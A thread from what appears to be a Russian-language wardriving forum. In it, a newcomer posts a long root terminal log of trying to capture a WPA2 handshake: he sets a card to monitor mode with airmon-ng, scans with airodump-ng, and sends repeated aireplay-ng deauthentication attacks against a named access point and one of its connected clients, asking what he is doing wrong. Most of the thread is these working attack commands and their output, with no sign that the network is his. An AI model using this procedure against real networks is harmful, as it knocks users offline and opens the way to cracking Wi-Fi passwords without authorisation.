[Wi-Fi, BT] Задай вопрос - получи ответ!

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by user100, 25 Apr 2015.

  1. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,673
    Likes Received:
    5,797
    Reputations:
    51
    Можно и с кувалдой прийти разбить поутер, по вашему это тоже Ddos атака, и вообще хоты бы разобрались с чем имеете дело. aircrack-ng
     
  2. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,673
    Likes Received:
    5,797
    Reputations:
    51
    binarymaster при всем уважении очень даже получится. Сейчас покажу
     
  3. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,673
    Likes Received:
    5,797
    Reputations:
    51
  4. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,673
    Likes Received:
    5,797
    Reputations:
    51
    Тебе же бабло не жмет, что вы нам говорите, о каком то порядку в 50 к????? Режим pci слота на подбор не влияет...
     
  5. AlexRU

    AlexRU Well-Known Member

    Joined:
    11 Oct 2015
    Messages:
    115
    Likes Received:
    489
    Reputations:
    4
    binarymaster likes this.
  6. snabgenech

    snabgenech New Member

    Joined:
    26 Oct 2015
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Уважаемые форумчане!
    Ни как не могу поймать хендшейки,я новичок, подскажите что не так делаю.
    Заранее спс.

    Code:
    root@neo:~# iwconfig
    eth0      no wireless extensions.
    
    wlan0     IEEE 802.11bgn  ESSID:eek:ff/any 
              Mode:Managed  Access Point: Not-Associated   Tx-Power=15 dBm 
              Retry short limit:7   RTS thr:eek:ff   Fragment thr:eek:ff
              Encryption key:eek:ff
              Power Management:eek:ff
            
    lo        no wireless extensions.
    
    wlan1     IEEE 802.11bgn  ESSID:eek:ff/any 
              Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm 
              Retry short limit:7   RTS thr=2347 B   Fragment thr:eek:ff
              Encryption key:eek:ff
              Power Management:eek:ff
            
    root@neo:~# airmon-ng check kill
    Killing these processes:
    
      PID Name
      819 wpa_supplicant
    
    root@neo:~# iwconfig
    eth0      no wireless extensions.
    
    wlan0     IEEE 802.11bgn  ESSID:eek:ff/any 
              Mode:Managed  Access Point: Not-Associated   Tx-Power=15 dBm 
              Retry short limit:7   RTS thr:eek:ff   Fragment thr:eek:ff
              Encryption key:eek:ff
              Power Management:eek:ff
            
    lo        no wireless extensions.
    
    wlan1     IEEE 802.11bgn  ESSID:eek:ff/any 
              Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm 
              Retry short limit:7   RTS thr=2347 B   Fragment thr:eek:ff
              Encryption key:eek:ff
              Power Management:eek:ff
            
    root@neo:~# airmon-ng start wlan1
    No interfering processes found
    PHY    Interface    Driver        Chipset
    
    phy0    wlan0        ath9k        Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
    phy1    wlan1        rtl8192cu    
            (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
            (mac80211 station mode vif disabled for [phy1]wlan1)
    
    
    root@neo:~# airmon-ng start mon
    No interfering processes found
    PHY    Interface    Driver        Chipset
    
    phy0    wlan0        ath9k        Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
    phy1    wlan1mon    rtl8192cu    
    
    root@neo:~# iwconfig
    wlan1mon  IEEE 802.11bgn  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm 
              Retry short limit:7   RTS thr=2347 B   Fragment thr:eek:ff
              Power Management:eek:n
            
    eth0      no wireless extensions.
    
    wlan0     IEEE 802.11bgn  ESSID:eek:ff/any 
              Mode:Managed  Access Point: Not-Associated   Tx-Power=15 dBm 
              Retry short limit:7   RTS thr:eek:ff   Fragment thr:eek:ff
              Encryption key:eek:ff
              Power Management:eek:ff
            
    lo        no wireless extensions.
    
    root@neo:~# airodump-ng mon
    Interface mon:
    ioctl(SIOCGIFINDEX) failed: No such device
    root@neo:~# airodump-ng wlan1mon
    CH  9 ][ Elapsed: 18 mins ][ 2015-11-05 19:49                                       
                                                                                                        
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                        
    84:C9:B2:CB:84:D2  -22     5040     9300    0   6  54e  WPA2 CCMP   PSK  DSL_2640NRU               
                                                                                                        
    BSSID              STATION            PWR   Rate    Lost    Frames  Probe                         
                                                                                                        
    84:C9:B2:CB:84:D2  6C:5F:1C:BE:E3:B7  -30    0e- 0e   326     9352                                 
    
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
    19:43:32  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    19:43:33  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:43:33  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:43:34  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:43:34  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:43:35  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:43:35  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:43:37  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:43:37  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:43:39  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:43:40  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
    19:44:22  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 11
    19:44:22  wlan1mon is on channel 11, but the AP uses channel 6
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
    19:44:33  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 11
    19:44:33  wlan1mon is on channel 11, but the AP uses channel 6
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
    19:44:37  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    19:44:37  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:44:38  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:44:38  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:44:39  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:44:39  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:44:40  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:44:42  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:44:42  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:44:44  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:44:46  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
    19:48:10  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 10
    19:48:10  wlan1mon is on channel 10, but the AP uses channel 6
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
    19:48:18  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    19:48:19  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:48:19  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:48:20  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:48:20  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:48:21  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:48:21  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:48:23  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:48:23  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:48:25  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:48:28  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
    19:49:18  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 8
    19:49:18  wlan1mon is on channel 8, but the AP uses channel 6
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
    19:49:22  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 3
    19:49:22  wlan1mon is on channel 3, but the AP uses channel 6
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
    19:49:26  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 4
    19:49:26  wlan1mon is on channel 4, but the AP uses channel 6
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
    19:49:33  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    19:49:33  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:49:34  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:49:34  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:49:35  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:49:35  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:49:35  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:49:38  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:49:38  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:49:40  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:49:42  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
    19:50:19  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 1
    19:50:19  wlan1mon is on channel 1, but the AP uses channel 6
    root@neo:~# aireplay-ng --deauth 10 -a 6C:5F:1C:BE:E3:B7 wlan1mon
    19:51:12  Waiting for beacon frame (BSSID: 6C:5F:1C:BE:E3:B7) on channel 11
    
    
    
    
    
    19:51:22  No such BSSID available.
    Please specify an ESSID (-e).
    root@neo:~#
    root@neo:~#
    root@neo:~#
    root@neo:~#
    root@neo:~#
    root@neo:~# aireplay-ng --deauth 10 -a 6C:5F:1C:BE:E3:B7 wlan1mon
    19:51:28  Waiting for beacon frame (BSSID: 6C:5F:1C:BE:E3:B7) on channel 6
    19:51:38  No such BSSID available.
    Please specify an ESSID (-e).
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1mon
    19:52:22  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    19:52:22  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
    19:52:22  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
    19:52:23  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
    19:52:23  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
    19:52:24  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:52:28  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
    19:52:31  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
    19:52:39  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:52:44  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
    19:52:47  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
    19:52:54  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:00  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
    19:53:02  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:08  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 119:53:08  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 219:53:08  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 1| 2 ACKs]
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1mon
    19:53:16  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    19:53:16  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
    19:53:16  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
    19:53:17  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:28  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
    19:53:34  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
    19:53:43  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:48  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
    19:53:50  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:55  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
    19:53:58  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:54:00  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 119:54:06  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 219:54:06  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 1| 219:54:06  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 1| 319:54:06  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 319:54:06  Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 4 ACKs]
    ^C
    root@neo:~# aireplay-ng --deauth 10 -a 6C:5F:1C:BE:E3:B7 wlan1mon19:54:19  Waiting for beacon frame (BSSID: 6C:5F:1C:BE:E3:B7) on channel 11
    19:54:29  No such BSSID available.
    Please specify an ESSID (-e).
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon19:54:33  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    19:54:34  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:54:34  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:54:35  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:54:39  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:54:48  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:54:49  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:54:51  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:54:53  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:54:54  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:54:56  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
    19:55:30  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    19:55:30  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:55:31  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:55:31  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:55:32  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:55:32  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:55:33  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:55:34  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:55:35  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:55:37  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:55:37  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
    19:56:07  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 5
    19:56:08  wlan1mon is on channel 5, but the AP uses channel 6
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
    19:56:17  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    19:56:17  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:56:18  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:56:18  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:56:19  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:56:19  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:56:19  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:56:21  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:56:22  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:56:24  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:56:26  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1
    Interface wlan1:
    ioctl(SIOCGIFINDEX) failed: No such device
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1mon
    19:56:51  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 10
    19:56:51  wlan1mon is on channel 10, but the AP uses channel 6
    root@neo:~# aireplay-ng --deauth 10 -a 6C:5F:1C:BE:E3:B7 wlan1mon19:57:02  Waiting for beacon frame (BSSID: 6C:5F:1C:BE:E3:B7) on channel 6
    19:57:12  No such BSSID available.
    Please specify an ESSID (-e).
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon19:57:22  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 3
    19:57:23  wlan1mon is on channel 3, but the AP uses channel 6
    root@neo:~#
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
    19:57:25  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 2
    19:57:26  wlan1mon is on channel 2, but the AP uses channel 6
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
    19:57:28  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    19:57:28  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:57:28  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:57:29  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:57:29  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:57:30  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:57:30  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:57:33  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:57:33  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:57:35  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    19:57:37  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 -- ignore-negative-one
    "aireplay-ng --help" for help.
    root@neo:~# aireplay-ng mon -a 84:C9:B2:CB:84:D2 -0 10 -- ignore-negative-one
    "aireplay-ng --help" for help.
    root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one
    20:12:15  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    20:12:16  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:12:16  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:12:17  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:12:17  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:12:18  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:12:18  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:12:20  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:12:20  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:12:22  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:12:22  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one
    20:13:05  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    20:13:05  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:06  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:06  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:07  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:07  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:08  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:09  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:10  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:11  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:12  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one
    20:13:48  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    20:13:48  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:49  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:49  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:50  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:50  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:51  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:52  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:53  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:55  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:13:55  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one
    20:17:12  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    20:17:13  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:13  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:13  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:14  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:14  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:15  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:15  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:17  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:19  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:19  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one
    20:17:33  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    20:17:33  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:34  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:34  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:35  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:35  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:36  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:37  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:38  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:40  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:17:41  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one
    20:26:51  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    20:26:51  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:26:52  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:26:52  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:26:53  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:26:53  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:26:54  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:26:56  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:26:56  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:26:58  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:27:00  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon20:27:19  Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    20:27:19  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:27:19  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:27:20  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
    20:27:20  Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
